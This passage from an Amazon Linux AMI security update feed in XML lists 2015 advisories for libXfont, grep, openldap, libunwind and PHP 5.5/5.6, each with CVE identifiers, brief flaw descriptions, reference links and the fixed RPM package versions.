</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2730" title="" id="CVE-2015-2730" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1699.html" title="" id="RHSA-2015:1699" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-freebl" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-13.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-597</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-597: important priority package update for libXfont</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1804:
An integer truncation flaw was discovered in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with the privileges of the X.Org server.
CVE-2015-1803:
A NULL pointer dereference flaw was discovered in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server.
CVE-2015-1802:
An integer overflow flaw was found in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with the privileges of the X.Org server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1802" title="" id="CVE-2015-1802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1803" title="" id="CVE-2015-1803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1804" title="" id="CVE-2015-1804" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1708.html" title="" id="RHSA-2015:1708" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont-devel" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-5.12.amzn1.i686.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-5.12.amzn1.i686.rpm</filename></package><package name="libXfont" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-5.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-598</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-598: low priority package update for grep</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1345:
A heap-based buffer overflow flaw was found in the way grep processed certain pattern and text combinations. An attacker able to trick a user into running grep on specially crafted input could use this flaw to crash grep or, potentially, read from uninitialized memory.
CVE-2012-5667:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way grep parsed large lines of data. An attacker able to trick a user into running grep on a specially crafted data file could use this flaw to crash grep or, potentially, execute arbitrary code with the privileges of the user running grep.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5667" title="" id="CVE-2012-5667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1345" title="" id="CVE-2015-1345" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1447.html" title="" id="RHSA-2015:1447" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="grep-debuginfo" version="2.20" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-debuginfo-2.20-1.14.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-2.20-1.14.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/grep-2.20-1.14.amzn1.i686.rpm</filename></package><package name="grep-debuginfo" version="2.20" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/grep-debuginfo-2.20-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-599</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-599: important priority package update for openldap compat-openldap</title><issued date="2015-10-09 16:33:00" /><updated date="2015-10-09 17:06:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6908:
A flaw was found in the way the OpenLDAP server daemon (slapd) parsed certain Basic Encoding Rules (BER) data. A remote attacker could use this flaw to crash slapd via a specially crafted packet.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6908" title="" id="CVE-2015-6908" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1840.html" title="" id="RHSA-2015:1840" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-debuginfo" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="compat-openldap-debuginfo" version="2.3.43" release="2.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/compat-openldap-debuginfo-2.3.43-2.5.amzn1.x86_64.rpm</filename></package><package name="compat-openldap" version="2.3.43" release="2.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/compat-openldap-2.3.43-2.5.amzn1.x86_64.rpm</filename></package><package name="compat-openldap-debuginfo" version="2.3.43" release="2.5.amzn1" epoch="1" arch="i686"><filename>Packages/compat-openldap-debuginfo-2.3.43-2.5.amzn1.i686.rpm</filename></package><package name="compat-openldap" version="2.3.43" release="2.5.amzn1" epoch="1" arch="i686"><filename>Packages/compat-openldap-2.3.43-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-600</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-600: low priority package update for libunwind</title><issued date="2015-10-09 16:35:00" /><updated date="2015-10-09 16:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3239:
An off-by-one array indexing error was found in the libunwind API, which could cause an error when reading untrusted binaries or dwarf debug info data. Red Hat products do not call the API in this way; and it is unlikely that any exploitable attack vector exists in current builds or supported usage.
1232265:
CVE-2015-3239 libunwind: off-by-one in dwarf_to_unw_regnum()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3239" title="" id="CVE-2015-3239" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libunwind" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-debuginfo" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-debuginfo-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-devel" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-devel-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-devel" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-devel-1.1-10.8.amzn1.i686.rpm</filename></package><package name="libunwind" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-1.1-10.8.amzn1.i686.rpm</filename></package><package name="libunwind-debuginfo" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-debuginfo-1.1-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-601</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-601: medium priority package update for php56</title><issued date="2015-10-20 14:50:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7804:
1271088:
CVE-2015-7804 php: uninitialized pointer in phar_make_dirstream()
CVE-2015-7803:
1271081:
CVE-2015-7803 php: NULL pointer dereference in phar_get_fp_offset()
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7803" title="" id="CVE-2015-7803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7804" title="" id="CVE-2015-7804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-intl" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.14-1.119.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-602</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-602: medium priority package update for php55</title><issued date="2015-10-20 14:52:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7804:
1271088:
CVE-2015-7804 php: uninitialized pointer in phar_make_dirstream()
CVE-2015-7803:
1271081:
CVE-2015-7803 php: NULL pointer dereference in phar_get_fp_offset()
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7803" title="" id="CVE-2015-7803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7804" title="" id="CVE-2015-7804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-cli" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.30" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.30-1.110.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.30" release="1.110.amzn1" epoch="0" 